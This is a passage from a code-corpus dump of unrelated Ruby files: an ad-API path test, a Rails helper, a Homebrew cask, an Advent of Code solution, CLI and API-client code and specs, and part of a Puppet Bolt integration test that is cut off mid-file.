  assert_equal('customers/1234/feedItemTargets/5~6~7~8', util.feed_item_target(1234, 5, 6, 7, 8))
  assert_equal('customers/1234/feedMappings/567~890', util.feed_mapping(1234, 567, 890))
  assert_equal('customers/1234/feedPlaceholderViews/5678', util.feed_placeholder_view(1234, 5678))
  assert_equal('customers/1234/feeds/5678', util.feed(1234, 5678))
  assert_equal('geoTargetConstants/123456', util.geo_target_constant(123456))
  assert_equal('customers/1234/geographicViews/567~890', util.geographic_view(1234, 567, 890))
  assert_equal('googleAdsFields/test_field', util.google_ads_field('test_field'))
  assert_equal('customers/1234/groupPlacementViews/567~890', util.group_placement_view(1234, 567, 890))
  assert_equal('customers/1234/hotelGroupViews/567~890', util.hotel_group_view(1234, 567, 890))
  assert_equal('customers/123456/hotelPerformanceView', util.hotel_performance_view(123456))
  assert_equal('customers/1234/incomeRangeViews/567~890', util.income_range_view(1234, 567, 890))
  assert_equal('customers/1234/keywordPlanAdGroups/5678', util.keyword_plan_ad_group(1234, 5678))
  assert_equal('customers/1234/keywordPlanAdGroupKeywords/5678', util.keyword_plan_ad_group_keyword(1234, 5678))
  assert_equal('customers/1234/keywordPlanCampaigns/5678', util.keyword_plan_campaign(1234, 5678))
  assert_equal('customers/1234/keywordPlanCampaignKeywords/5678', util.keyword_plan_campaign_keyword(1234, 5678))
  assert_equal('customers/1234/keywordPlans/5678', util.keyword_plan(1234, 5678))
  assert_equal('customers/1234/keywordViews/567~890', util.keyword_view(1234, 567, 890))
  assert_equal('customers/1234/labels/5678', util.label(1234, 5678))
  assert_equal('languageConstants/123456', util.language_constant(123456))
  assert_equal('customers/1234/locationViews/567~890', util.location_view(1234, 567, 890))
  assert_equal('customers/1234/managedPlacementViews/567~890', util.managed_placement_view(1234, 567, 890))
  assert_equal('customers/1234/mediaFiles/5678', util.media_file(1234, 5678))
  assert_equal('customers/1234/merchantCenterLinks/5678', util.merchant_center_link(1234, 5678))
  assert_equal('mobileAppCategoryConstants/123456', util.mobile_app_category_constant(123456))
  assert_equal('mobileDeviceConstants/123456', util.mobile_device_constant(123456))
  assert_equal('operatingSystemVersionConstants/123456', util.operating_system_version_constant(123456))
  assert_equal('customers/1234/parentalStatusViews/567~890', util.parental_status_view(1234, 567, 890))
  assert_equal('productBiddingCategoryConstants/123~456~789', util.product_bidding_category_constant(123, 456, 789))
  assert_equal('customers/1234/productGroupViews/567~890', util.product_group_view(1234, 567, 890))
  assert_equal('customers/1234/recommendations/5678', util.recommendation(1234, 5678))
  assert_equal('customers/1234/remarketingActions/5678', util.remarketing_action(1234, 5678))
  assert_equal('customers/1234/searchTermViews/56~78~90', util.search_term_view(1234, 56, 78, 90))
  assert_equal('customers/1234/sharedCriteria/567~890', util.shared_criterion(1234, 567, 890))
  assert_equal('customers/1234/sharedSets/5678', util.shared_set(1234, 5678))
  assert_equal('customers/1234/shoppingPerformanceView', util.shopping_performance_view(1234))
  assert_equal('customers/1234/thirdPartyAppAnalyticsLinks/5678', util.third_party_app_analytics_link(1234, 5678))
  assert_equal('topicConstants/123456', util.topic_constant(123456))
  assert_equal('customers/1234/topicViews/567~890', util.topic_view(1234, 567, 890))
  assert_equal('customers/1234/userInterests/5678', util.user_interest(1234, 5678))
  assert_equal('customers/1234/userLists/5678', util.user_list(1234, 5678))
  assert_equal('customers/1234/videos/5678', util.video(1234, 5678))
end
# Passing nil IDs to a path helper must raise rather than silently build a
# malformed resource name.
def test_malformed_path_input
  lookup_util = Google::Ads::GoogleAds::Utils::V3::PathLookupUtil.new
  assert_raises(ArgumentError) { lookup_util.campaign(nil, nil) }
end
end
| 39.66776 | 86 | 0.754172 |
01ccce2cf94b10232c2c529ac914b36d0eab1996 | 970 | require Rails.root.join('app', 'helpers', 'application_helper')
module ApplicationHelper
  # Checks the current route using the 'ControllerName#ActionName' notation.
  # Shorthand for calling current_controller? and current_action? together;
  # falls back to current_page? when the route contains no '#'.
  def current_route?(route)
    if route.include?('#')
      controller_part, action_part = route.split('#')
      current_controller?(controller_part) && current_action?(action_part)
    else
      current_page?(route)
    end
  end

  # Override the GitLab promo links with the Perforce host.
  def promo_host
    'perforce.com'
  end

  # Promo links are served over plain HTTP.
  def promo_url
    "http://#{promo_host}"
  end

  # With more than two segments, build an absolute '/help/...' path with each
  # segment URL-escaped; otherwise defer to the stock implementation.
  def help_page_path(*args)
    if args.length <= 2
      super(*args)
    else
      '/' + ['help', *args].map { |segment| CGI.escape(segment) }.join('/')
    end
  end
end
| 31.290323 | 105 | 0.713402 |
28eb81cc39819dfd791f7d58d05292a24678a5ac | 528 | module DwollaSwagger
#
# Generated swagger model for the `Id` type: it declares no attributes of its
# own beyond what BaseObject provides.
class Id < BaseObject
  attr_accessor

  # attribute mapping from ruby-style variable name to JSON key
  def self.attribute_map
    {}
  end

  # attribute type
  def self.swagger_types
    {}
  end

  def initialize(attributes = {})
    return unless attributes.is_a?(Hash) && !attributes.empty?

    # convert string keys to symbols
    attributes = attributes.each_with_object({}) { |(key, value), memo| memo[key.to_sym] = value }
  end
end
end
| 18.206897 | 79 | 0.587121 |
218b9442cbbc10da0dd06357045cb2dbd23c12fc | 531 | # frozen_string_literal: true
# Background job that imports a single DOI record via Event.import_doi.
class OtherDoiByIdJob < ApplicationJob
  queue_as :lupo_background

  # retry_on ActiveRecord::Deadlocked, wait: 10.seconds, attempts: 3
  # retry_on Faraday::TimeoutError, wait: 10.minutes, attempts: 3
  # discard_on ActiveJob::DeserializationError

  # Log and swallow deserialization / Elasticsearch bad-request errors so the
  # job is not retried for unrecoverable payloads.
  rescue_from ActiveJob::DeserializationError,
              Elasticsearch::Transport::Transport::Errors::BadRequest do |error|
    Rails.logger.error error.message
  end

  # id: the DOI identifier to import; options are forwarded to Event.import_doi.
  def perform(id, options = {})
    Event.import_doi(id, options)
  end
end
| 26.55 | 80 | 0.745763 |
287cf2bdd5b7a8f009da67a64a1c5826e29ad6be | 1,028 | class AddEslCategories < ActiveRecord::DataMigration
# Seeds the ESL category table: one active category per revenue-vehicle class
# plus a single active category for facilities.
def up
  revenue_vehicle_names = [
    'Heavy-Duty Large Bus',
    'Heavy-Duty Small Bus',
    'Medium-Duty and Purpose-Built Bus',
    'Light Duty Mid-Sized Bus',
    'Light Duty Small Bus, Cutaways, and Modified Van',
    'Electric Trolley-Bus',
    'Steel-Wheel Trolley',
    'Ferry',
    'Rail Vehicle'
  ]

  revenue_vehicle_names.each do |name|
    EslCategory.create!(name: name, class_name: 'RevenueVehicle', active: true)
  end
  EslCategory.create!(name: 'Facilities', class_name: 'Facility', active: true)
end
end | 51.4 | 111 | 0.664397 |
5d3f9cc670ca7bb5497f15389cf7954d56c01c51 | 894 | cask "opera-developer" do
  version "78.0.4072.0"
  sha256 "62e14a35da67800c6214c16dd4fa37f5653457418c1312a6c7122a4159074022"

  # Versioned installer fetched from Opera's geo-distributed mirror.
  url "https://get.geo.opera.com/pub/opera-developer/#{version}/mac/Opera_Developer_#{version}_Setup.dmg"
  name "Opera Developer"
  desc "Web browser"
  homepage "https://www.opera.com/computer/beta"

  # Discover new versions by scraping the mirror's directory listing for
  # version-shaped hrefs.
  livecheck do
    url "https://get.geo.opera.com/pub/opera-developer/"
    strategy :page_match
    regex(/href="(\d+(?:\.\d+)*)/i)
  end

  # The app updates itself, so Homebrew skips reinstalling on upgrade.
  auto_updates true

  app "Opera Developer.app"

  # Residual files removed by `brew uninstall --zap`.
  zap trash: [
    "~/Library/Application Support/com.operasoftware.OperaDeveloper",
    "~/Library/Caches/com.operasoftware.OperaDeveloper",
    "~/Library/Cookies/com.operasoftware.OperaDeveloper.binarycookies",
    "~/Library/Preferences/com.operasoftware.OperaDeveloper.plist",
    "~/Library/Saved Application State/com.operasoftware.OperaDeveloper.savedState",
  ]
end
ab7cd9c5eeea325531a9d92af351443c07af44c6 | 3,343 | require_relative 'common'
# Inspired by RubyGems's Gem::List [implem](https://github.com/rubygems/rubygems/blob/master/lib/rubygems/util/list.rb)
# Circular singly-linked list modelling the cup game (Advent of Code day 23).
# Inspired by RubyGems's Gem::List implementation. Each node holds its cup
# value, a link to the next node (+tail+), the list length, the final node,
# and a value->node lookup hash (+links+) shared by every node for O(1)
# access to any cup by label.
class CupCircle
  include Enumerable

  attr_accessor :tail
  # Fix: the original also listed :tail here, redundantly re-defining the
  # reader that attr_accessor above already provides.
  attr_reader :value, :length, :last, :links

  # Builds a node holding +value+ in front of +tail+ (the rest of the list).
  # The links hash is shared between nodes and updated in place.
  def initialize(value, tail = nil)
    @value = value
    @tail = tail

    if tail
      @length = tail.length + 1
      @last = tail.last
      @links = tail.links.tap { |l| l[value] = self }
    else
      @length = 1
      @last = self
      @links = { value => self }
    end
  end

  # Yields each value from this node onward. Terminates at the end of an
  # unfinalized list; loops forever once the circle has been closed (bound
  # iteration with Enumerable's take/find/etc.). Returns an Enumerator when
  # called without a block.
  def each
    return enum_for(:each) unless block_given?

    n = self
    while n
      yield n.value
      n = n.tail
    end
  end

  # Returns a new head node in front of the current one. Disallowed after
  # the circle has been closed.
  def prepend(value)
    raise "Already finalized" if @finalized

    self.class.new value, self
  end

  # Closes the circle: blocks further prepends, pushes the final length to
  # every node, and links the last node back to this head.
  # Needed because we're a circle.
  def finalize!
    @finalized = true
    propagate_final_length
    @last.tail = self
  end

  protected

  # Copies this head node's length to every following node.
  def propagate_final_length
    curr = tail
    until curr.nil?
      curr.length = self.length
      curr = curr.tail
    end
  end

  attr_writer :length
end
# Advent of Code 2020, day 23: the "crab cups" game played on a CupCircle.
class Day23 < AdventDay
  # Part 1: play 100 rounds, then read the cup labels clockwise from cup 1.
  def first_part
    cups = input
    cups.finalize!
    end_result = play_game(game_for(cups, number_of_rounds: 100))

    # Cup 1 is the anchor; the answer is every other label following it.
    circle_start = end_result.links[1]
    circle_start.tail.take(cups.length - 1).join
  end

  # Part 2: pad the circle to one million cups, play ten million rounds, and
  # multiply the labels of the two cups following cup 1.
  def second_part
    initial_cups = input
    # reverse(...) yields the missing labels high-to-low so that repeated
    # prepends leave them ascending after the initial cups.
    missing = reverse((initial_cups.length+1)..1_000_000)
    cups = missing.reduce(initial_cups) { |linked_list, cup| linked_list.prepend(cup) }
    cups.finalize!
    end_result = play_game(game_for(cups, initial_cup: initial_cups, number_of_rounds: 10_000_000))

    start = end_result.links[1]
    first_cup = start.tail
    second_cup = first_cup.tail
    first_cup.value * second_cup.value
  end

  private

  # Drains the game enumerator and returns the circle's final state.
  def play_game(game)
    game_result = nil
    loop do
      game_result = game.next
    rescue StopIteration
      break
    end
    game_result
  end

  # Builds an Enumerator that plays one round per iteration, yielding the
  # (mutated) circle after each round.
  def game_for(cups, initial_cup: cups, number_of_rounds: 100)
    selected = initial_cup
    max_val = cups.length
    # Assumption: no gaps in cup numerotation
    # Assumption: each cup number is distinct
    Enumerator.new(number_of_rounds) do |yielder|
      number_of_rounds.times do |n|
        # Pick up the three cups clockwise of the current one.
        picked_ups = 3.times.each_with_object([]) do |_, picked_cups|
          previous = (picked_cups.last || selected)
          picked_cups << previous.tail
        end

        # Candidate destinations: current label minus one, wrapping to max,
        # skipping labels currently picked up.
        order = [
          reverse(1...selected.value),
          reverse(selected.value+1..max_val)
        ].lazy.flat_map(&:lazy)
        picked_up_values = picked_ups.map(&:value)
        destination_value = order.find { |to_select| !picked_up_values.include? to_select }
        destination = cups.links[destination_value]

        # Splice the picked-up cups back in right after the destination cup.
        selected.tail = picked_ups.last.tail
        following = destination.tail
        destination.tail = picked_ups.first
        picked_ups.last.tail = following

        yielder << cups
        selected = selected.tail
      end
    end
  end

  # Enumerates a range in descending order (handles exclusive-end ranges).
  def reverse(range)
    start = range.begin
    finish = range.end
    offset = range.exclude_end? ? 1 : 0
    (finish-offset .. start).step(-1)
  end

  # Parses the puzzle input digits into a CupCircle (not yet finalized).
  def convert_data(data)
    cups = data.strip.chars.map(&:to_i)
    first_val = cups.last
    cups[0...-1].
      reverse.
      reduce(CupCircle.new(first_val)) { |circle, cup| circle.prepend(cup) }
  end
end
require "benchmark" # NOTE(review): Benchmark appears unused in this chunk — confirm before removing.

# Run both puzzle parts when this file is executed.
Day23.solve
| 22.741497 | 119 | 0.650015 |
acf1f86c01d78ec20e458a37e633989799ef0e23 | 6,625 | require_relative 'base_command'
require_relative '../../atmos/source_path'
require_relative '../../atmos/generator'
require_relative '../../atmos/utils'
module SimplyGenius
  module Atmos
    module Commands

      # CLI command that installs or updates the configuration templates atmos
      # uses to create infrastructure resources.
      # From https://github.com/rubber/rubber/blob/master/lib/rubber/commands/vulcanize.rb
      class Generate < BaseCommand

        def self.description
          <<~EOF
            Installs configuration templates used by atmos to create infrastructure
            resources e.g.
            atmos generate aws/vpc
            use --list to get a list of the template names for a given sourceroot
          EOF
        end

        option ["-f", "--force"],
               :flag, "Overwrite files that already exist"
        option ["-n", "--dryrun"],
               :flag, "Run but do not make any changes"
        option ["-q", "--quiet"],
               # Fix: help text typo "Supress" -> "Suppress"
               :flag, "Suppress status output"
        option ["-s", "--skip"],
               :flag, "Skip files that already exist"
        option ["-d", "--[no-]dependencies"],
               :flag, "Walk dependencies, or not", default: true
        option ["-l", "--list"],
               :flag, "list available templates"
        option ["-u", "--update"],
               :flag, "update all installed templates\n"
        option ["-p", "--sourcepath"],
               "PATH", "search for templates using given sourcepath",
               multivalued: true
        option ["-r", "--[no-]sourcepaths"],
               :flag, "clear sourcepaths from template search\n", default: true
        option ["-c", "--context"],
               "CONTEXT", "provide context variables (dot notation)",
               multivalued: true

        parameter "TEMPLATE ...", "atmos template(s)", required: false

        # Entry point: registers template source paths, then either lists
        # matching templates (--list) or applies/updates them.
        def execute
          signal_usage_error "template name is required" if template_list.blank? && ! list? && !update?

          # Explicit -p paths are registered first so they win lookups.
          sourcepath_list.each do |sp|
            SourcePath.register(File.basename(sp), sp)
          end

          if sourcepaths?
            # don't want to fail for new repo
            if Atmos.config && Atmos.config.is_atmos_repo?
              Atmos.config['atmos.template_sources'].try(:each) do |item|
                SourcePath.register(item.name, item.location)
              end
            end

            # Always search for templates against the bundled templates directory
            SourcePath.register('bundled', File.expand_path('../../../../../templates', __FILE__))
          end

          if list?
            logger.info "Valid templates are:"
            SourcePath.registry.each do |spname, sp|
              logger.info("\tSourcepath #{sp}")
              filtered_names = sp.template_names.select do |name|
                template_list.blank? || template_list.any? {|f| name =~ /#{f}/ }
              end
              filtered_names.each {|n| logger.info("\t\t#{n}")}
            end
          else
            g = Generator.new(force: force?,
                              pretend: dryrun?,
                              quiet: quiet?,
                              skip: skip?,
                              dependencies: dependencies?)
            begin
              # --context key=value pairs become nested template context.
              context = SettingsHash.new
              context_list.each do |c|
                key, value = c.split('=', 2)
                context.notation_put(key, value)
              end

              if update?
                # this isn't 100% foolproof, but is a convenience that should help for most cases
                filtered_templates = state[:visited_templates].select do |vt|
                  template_list.blank? || template_list.any? {|n| vt[:name] =~ /#{n}/ }
                end

                # Re-register the source paths recorded in saved state, warning
                # when they disagree with the current configuration.
                sps = filtered_templates.collect(&:source).uniq
                sps.each do |src|
                  spname = src[:name]
                  sploc = src[:location]
                  existing_sp = SourcePath.registry[spname]
                  if existing_sp
                    if existing_sp.location != sploc
                      logger.warn("Saved sourcepath location differs from that in configuration")
                      logger.warn(" #{spname} -> saved=#{sploc} configured=#{existing_sp.location}")
                      logger.warn(" consider running with --no-sourcepaths")
                    end
                  else
                    sp = SourcePath.register(spname, sploc)
                    logger.warn("Saved state contains a source path missing from configuration: #{sp}")
                  end
                end

                filtered_templates.each do |vt|
                  name = vt[:name]
                  ctx = vt[:context]
                  spname = vt[:source][:name]
                  sp = SourcePath.registry[spname]
                  tmpl = sp.template(name)
                  tmpl.scoped_context.merge!(ctx) if ctx
                  tmpl.context.merge!(context)
                  g.apply_template(tmpl)
                end
              else
                g.generate(*template_list, context: context)
              end

              save_state(g.visited_templates, template_list)
            rescue ArgumentError => e
              logger.error(e.message)
              exit 1
            end
          end
        end

        # Path of the YAML file used to remember which templates were applied.
        def state_file
          @state_file ||= Atmos.config["atmos.generate.state_file"]
        end

        # Lazily loads the saved generate state (empty when no file is
        # configured or it does not exist yet).
        def state
          @state ||= begin
            if state_file.present?
              path = File.expand_path(state_file)
              yml_hash = {}
              if File.exist?(path)
                yml_hash = YAML.load_file(path)
              end
              SettingsHash.new(yml_hash)
            else
              SettingsHash.new
            end
          end
        end

        # Records the templates applied in this run (with their contexts) so a
        # later --update can re-apply them; sorted/deduped for stable files.
        def save_state(visited_templates, entrypoint_template_names)
          if state_file.present?
            visited_state = []
            visited_templates.each do |tmpl|
              visited_tmpl = tmpl.to_h
              visited_tmpl[:context] = tmpl.scoped_context.to_h
              visited_state << visited_tmpl
            end

            state[:visited_templates] ||= []
            state[:visited_templates].concat(visited_state)
            state[:visited_templates].sort! {|h1, h2| h1[:name] <=> h2[:name] }.uniq!

            state[:entrypoint_templates] ||= []
            state[:entrypoint_templates].concat(entrypoint_template_names)
            state[:entrypoint_templates].sort!.uniq!

            File.write(state_file, YAML.dump(state.to_hash))
          end
        end

      end

    end
  end
end
| 35.239362 | 103 | 0.514717 |
260fa90d46fd6e176ec49806290b76ca62c78713 | 8,569 | require './spec/spec_helper'
require './lib/neutrino/api/client'
require 'fakeweb'
require 'net/http'
require 'uri'
# Unit specs for Neutrino::Api::Client configuration accessors, request
# construction/signing, and HTTP verb selection.
describe Neutrino::Api::Client do
  before(:each) do
    Neutrino::Api::Client.config = TestConfig.to_hash
  end

  describe 'self.config' do
    it 'returns a config dictionary when one has been set' do
      expect(described_class.config).to eq(TestConfig.to_hash)
    end
  end

  describe 'self.symbolize_keys' do
    context 'given nil' do
      let(:hash) { nil }

      it 'returns nil' do
        expect(described_class.symbolize_keys(hash)).to be_nil
      end
    end

    context 'given an empty Hash' do
      let(:hash) { {} }

      it 'returns an empty hash' do
        expect(described_class.symbolize_keys(hash)).to eq({})
      end
    end

    context 'given a hash with a few strings as keys' do
      let(:hash) { { 'foo' => 5, 'bar' => [] } }

      it 'returns a hash that has the same number of keys as the passed' do
        expect(described_class.symbolize_keys(hash).keys.count).to eq(hash.keys.count)
      end

      # Fix: description previously said "strings" but the assertion checks
      # that every key is a Symbol.
      it 'returns a hash where all the keys are symbols' do
        described_class.symbolize_keys(hash).keys.each { |key| expect(key).to be_an_instance_of(Symbol) }
      end
    end
  end

  describe 'self.protocol' do
    it 'returns the protocol specified in the config when a config was given' do
      expect(described_class.protocol).to eq(TestConfig.protocol)
    end
  end

  describe 'self.host' do
    it 'returns the host specified in the config when a config was given' do
      expect(described_class.host).to eq(TestConfig.host)
    end
  end

  describe 'self.port' do
    it 'returns the port specified in the config when a config was given' do
      expect(described_class.port).to eq(TestConfig.port)
    end
  end

  describe 'self.auth_user' do
    it 'returns the auth_user specified in the config when a config was given' do
      expect(described_class.auth_user).to eq(TestConfig.auth_user)
    end
  end

  describe 'self.auth_pass' do
    it 'returns the auth_pass specified in the config when a config was given' do
      expect(described_class.auth_pass).to eq(TestConfig.auth_pass)
    end
  end

  describe 'self.user_root' do
    it 'returns the user_root specified in the config when a config was given' do
      expect(described_class.user_root).to eq(TestConfig.user_root)
    end
  end

  describe 'self.user_extension' do
    it 'returns the user_extension specified in the config when a config was given' do
      expect(described_class.user_extension).to eq(TestConfig.user_extension)
    end
  end

  describe 'self.api_version' do
    it 'returns the api_version specified in the config when a config was given' do
      expect(described_class.api_version).to eq(TestConfig.api_version)
    end

    it 'returns the default api_version when a config was not given' do
      described_class.config = nil
      expect(described_class.api_version).to eq(described_class::DEFAULT_API_VERSION)
    end

    it 'returns the default api_version when the given config contains no api_version' do
      described_class.config = {}
      expect(described_class.api_version).to eq(described_class::DEFAULT_API_VERSION)
    end
  end

  describe 'self.perform_request' do
    it 'raises an error when a bogus uri is given' do
      expect { described_class.perform_request('/bogus') }.to raise_error
    end

    let(:mock_http) { Object.new }
    let(:not_found_response) { Object.new }
    let(:server_error_response) { Object.new }
    let(:response_body) { 'I am the response body' }

    before(:each) do
      allow(mock_http).to receive(:body)
      allow(Net::HTTP).to receive(:start).and_yield(mock_http)
      allow(not_found_response).to receive(:code).and_return('404')
      allow(server_error_response).to receive(:code).and_return('500')
      allow(server_error_response).to receive(:body).and_return('')
    end

    # Low-level connection failures are normalized to 'Connection refused'.
    it 'raises "Connection refused" when the http request throws an Errno::ECONNREFUSED' do
      allow(mock_http).to receive(:request).and_raise(Errno::ECONNREFUSED)
      expect { described_class.perform_request('/bogus') }.to raise_error('Connection refused')
    end

    it 'raises "Connection refused" when the http request throws an OpenSSL::SSL::SSLError' do
      allow(mock_http).to receive(:request).and_raise(OpenSSL::SSL::SSLError)
      expect { described_class.perform_request('/bogus') }.to raise_error('Connection refused')
    end
  end

  describe 'self.build_request' do
    let(:mock_http) { double }
    let(:mock_request) { Net::HTTP::Get }
    let(:mock_hmac_id) { 'fake_hmac_id' }
    let(:mock_hmac_key) { 'fake_hmac_key' }
    let(:fake_path) { 'https://goto:123/api' }
    let(:params_with_tid) { { tid: 'optional_tid' } }
    let(:empty_params) { {} }

    before(:each) do
      allow(mock_http).to receive(:body)
      allow(Net::HTTP).to receive(:start).and_yield(mock_http)
      allow(mock_http).to receive(:request)
      allow(described_class).to receive(:hmac_id).and_return(mock_hmac_id)
      allow(described_class).to receive(:hmac_key).and_return(mock_hmac_key)
    end

    context 'HMAC authentication' do
      let(:mock_tenant_id) { 'fake_tenant' }
      let(:mock_tenant_key) { 'fake_tenant_key' }

      context 'without tenant configured' do
        before(:each) do
          allow(described_class).to receive(:tenant_id).and_return(nil)
          allow(described_class).to receive(:tenant_key).and_return(nil)
        end

        it 'and request has been signed' do
          expect(ApiAuth).to receive(:sign!).with(mock_request, mock_hmac_id, mock_hmac_key)
          described_class.build_request(fake_path)
        end

        it 'request has been signed with tid specified in options' do
          expect(ApiAuth).to receive(:sign!).with(mock_request, mock_hmac_id, mock_hmac_key)
          described_class.build_request(fake_path, params_with_tid)
        end
      end

      context 'with tenant configured' do
        before(:each) do
          allow(described_class).to receive(:tenant_id).and_return(mock_tenant_id)
          allow(described_class).to receive(:tenant_key).and_return(mock_tenant_key)
        end

        it 'and request has been signed' do
          expect(ApiAuth).to receive(:sign!).with(mock_request, mock_hmac_id, anything)
          described_class.build_request(fake_path)
        end

        it 'and request has been signed with tid specified in option hash' do
          expect(ApiAuth).to receive(:sign!).with(mock_request, mock_hmac_id, mock_hmac_key)
          described_class.build_request(fake_path, params_with_tid)
        end

        context 'when basic authentication is specified on request' do
          it 'should not sign request' do
            expect(ApiAuth).to_not receive(:sign!)
            described_class.build_request(fake_path, empty_params, nil, true)
          end
        end
      end

      context 'without application configured' do
        before(:each) do
          described_class.config[:hmac_id] = nil
          described_class.config[:hmac_key] = nil
        end

        it 'should not sign request' do
          expect(ApiAuth).to_not receive(:sign!)
          described_class.build_request(fake_path)
        end
      end
    end
  end

  describe 'self.get_method' do
    let(:options) { {} }

    context 'when options specify no methods' do
      it 'returns Net::HTTP::Get' do
        expect(described_class.get_method(options)).to eq(Net::HTTP::Get)
      end
    end

    context 'when options contain the :get method' do
      before(:each) { options[:method] = :get }

      it 'returns Net::HTTP::Get' do
        expect(described_class.get_method(options)).to eq(Net::HTTP::Get)
      end
    end

    context 'when options contain the :post method' do
      before(:each) { options[:method] = :post }

      it 'returns Net::HTTP::Post' do
        expect(described_class.get_method(options)).to eq(Net::HTTP::Post)
      end
    end

    context 'when options contain the :post_multipart method' do
      before(:each) { options[:method] = :post_multipart }

      it 'returns Net::HTTP::Post::Multipart' do
        expect(described_class.get_method(options)).to eq(Net::HTTP::Post::Multipart)
      end
    end

    context 'when options contain the :delete method' do
      before(:each) { options[:method] = :delete }

      it 'returns Net::HTTP::Delete' do
        expect(described_class.get_method(options)).to eq(Net::HTTP::Delete)
      end
    end
  end
end
| 28.658863 | 105 | 0.675108 |
1812242055b1b852f3882900b5f4b65544c523f2 | 728 | # This code is free software; you can redistribute it and/or modify it under
# the terms of the new BSD License.
#
# Copyright (c) 2008-2012, Sebastian Staudt
require 'steam-condenser/servers/packets/base_packet'
module SteamCondenser::Servers::Packets

  # This packet class represents an A2S_INFO request sent to a game server
  #
  # It will cause the server to send some basic information about itself, e.g.
  # the running game, map and the number of players.
  #
  # @author Sebastian Staudt
  # @see GameServer#update_server_info
  class A2S_INFO_Packet

    include BasePacket

    # Creates a new A2S_INFO request object
    # The payload (including its trailing NUL byte) is the fixed challenge
    # string the Source query protocol expects for this request.
    def initialize
      super A2S_INFO_HEADER, "Source Engine Query\0"
    end

  end
end
| 26 | 79 | 0.741758 |
ab060339fdc5e01cf78ef9b9cec48cc14b1c8e0d | 20,915 | # frozen_string_literal: true
require 'spec_helper'
require 'bolt_spec/conn'
require 'bolt_spec/files'
require 'bolt_spec/integration'
require 'bolt_spec/puppet_agent'
require 'bolt_spec/run'
describe "apply", expensive: true do
include BoltSpec::Conn
include BoltSpec::Files
include BoltSpec::Integration
include BoltSpec::PuppetAgent
include BoltSpec::Run
let(:modulepath) { File.join(__dir__, '../fixtures/apply') }
let(:hiera_config) { File.join(__dir__, '../fixtures/configs/empty.yml') }
let(:config_flags) { %W[--format json --targets #{uri} --password #{password} --modulepath #{modulepath}] + tflags }
describe 'over ssh', ssh: true do
let(:uri) { conn_uri('ssh') }
let(:user) { conn_info('winrm')[:user] }
let(:password) { conn_info('ssh')[:password] }
let(:tflags) { %W[--no-host-key-check --run-as root --sudo-password #{password}] }
def root_config
{ 'modulepath' => File.join(__dir__, '../fixtures/apply') }
end
def agent_version_inventory
inventory = docker_inventory(root: true)
inventory['groups'] << {
'name' => 'agent_targets',
'groups' => [
{ 'name' => 'puppet_5',
'targets' => ['puppet_5_node'] },
{ 'name' => 'puppet_6',
'targets' => ['puppet_6_node'] }
]
}
inventory
end
def lib_plugin_inventory
{ 'version' => 2,
'targets' => [{
'uri' => conn_uri('ssh'),
'plugin_hooks' => {
'puppet_library' => {
'plugin' => 'puppet_agent'
}
}
}] }
end
def error_plugin_inventory
{ 'version' => 2,
'targets' => [{
'uri' => conn_uri('ssh'),
'name' => 'error',
'plugin_hooks' => {
'puppet_library' => {
'plugin' => 'task',
'task' => 'prep::error'
}
}
}, {
'uri' => conn_uri('ssh'),
'name' => 'success',
'plugin_hooks' => {
'puppet_library' => {
'plugin' => 'puppet_agent'
}
}
}, {
# These fail the puppet_agent::version check if they're fake. Seems
# like more effort than it's worth to mock them
'uri' => conn_uri('ssh'),
'name' => 'badparams',
'plugin_hooks' => {
'puppet_library' => {
'plugin' => 'task',
'task' => 'puppet_agent::install',
'parameters' => {
'collection' => 'The act or process of collecting.'
}
}
}
}, {
'uri' => conn_uri('ssh'),
'name' => 'badplugin',
'plugin_hooks' => {
'puppet_library' => {
'plugin' => 'what plugin?'
}
}
}] }
end
def task_plugin_inventory
{ 'version' => 2,
'targets' => [{
'uri' => conn_uri('ssh'),
'plugin_hooks' => {
'puppet_library' => {
'plugin' => 'task',
'task' => 'puppet_agent::install',
'parameters' => { 'version' => '6.2.0' }
}
}
}],
'config' => root_config }
end
after(:all) do
ssh_node = conn_uri('ssh', include_password: true)
uninstall([ssh_node, 'agent_targets'], inventory: agent_version_inventory)
end
context "when running against puppet 5 or puppet 6" do
before(:all) do
# install puppet5
install('puppet_5', collection: 'puppet5', inventory: agent_version_inventory)
result = run_task('puppet_agent::version', 'puppet_5', {}, inventory: agent_version_inventory)
expect(result.count).to eq(1)
expect(result[0]).to include('status' => 'success')
expect(result[0]['result']['version']).to match(/^5/)
# install puppet6
result = run_task('puppet_agent::install', 'puppet_6', { 'collection' => 'puppet6' },
config: root_config, inventory: agent_version_inventory)
expect(result.count).to eq(1)
expect(result[0]).to include('status' => 'success')
result = run_task('puppet_agent::version', 'puppet_6', {}, inventory: agent_version_inventory)
expect(result.count).to eq(1)
expect(result[0]).to include('status' => 'success')
expect(result[0]['result']['version']).to match(/^6/)
end
it 'runs a ruby task' do
with_tempfile_containing('inventory', YAML.dump(agent_version_inventory), '.yaml') do |inv|
results = run_cli_json(%W[task run basic::ruby_task --targets agent_targets
--modulepath #{modulepath} --inventoryfile #{inv.path}])
results['items'].each do |result|
expect(result['status']).to eq('success')
expect(result['result']).to eq('ruby' => 'Hi')
end
end
end
it 'runs an apply plan' do
with_tempfile_containing('inventory', YAML.dump(agent_version_inventory), '.yaml') do |inv|
results = run_cli_json(%W[plan run basic::notify --targets agent_targets
--modulepath #{modulepath} --inventoryfile #{inv.path}])
results.each do |result|
expect(result['status']).to eq('success')
report = result['result']['report']
expect(report['resource_statuses']).to include("Notify[Apply: Hi!]")
end
end
end
it 'succeeds with an empty hiera config' do
with_tempfile_containing('bolt', YAML.dump("hiera-config" => hiera_config), '.yaml') do |conf|
results = run_cli_json(%W[plan run prep --configfile #{conf.path}] + config_flags)
results.each do |result|
expect(result['status']).to eq('success')
report = result['result']['report']
expect(report['resource_statuses']).to include("Notify[Hello #{uri}]")
end
end
end
it 'gets resources' do
with_tempfile_containing('inventory', YAML.dump(agent_version_inventory), '.yaml') do |inv|
results = run_cli_json(%W[plan run basic::resources --targets agent_targets
--modulepath #{modulepath} --inventoryfile #{inv.path}])
results.each do |result|
expect(result['status']).to eq('success')
resources = result['result']['resources']
expect(resources.map { |r| r['type'] }.uniq).to eq(%w[User File])
expect(resources.select { |r| r['title'] == user && r['type'] == 'User' }.count).to eq(1)
expect(resources.select { |r| r['title'] == '/tmp' && r['type'] == 'File' }.count).to eq(1)
end
end
end
it 'does not create Boltdir' do
inventory_data = agent_version_inventory
is_boltdir = "if [ -d ~/.puppetlabs ]; then echo 'exists'; else echo 'not found'; fi"
results = run_command(is_boltdir, 'agent_targets', inventory: inventory_data)
results.each do |result|
expect(result['status']).to eq('success')
expect(result['result']['stdout']).to match(/not found/)
end
